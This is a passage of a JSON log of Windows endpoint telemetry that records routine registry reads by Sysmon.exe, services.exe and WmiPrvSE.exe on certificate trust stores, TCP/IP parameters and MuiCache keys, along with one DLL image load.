"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "utildll.dll", - "image_path": "C:\\Windows\\System32\\utildll.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3808, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3808, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3808, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": 
"Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, 
- "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848550000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
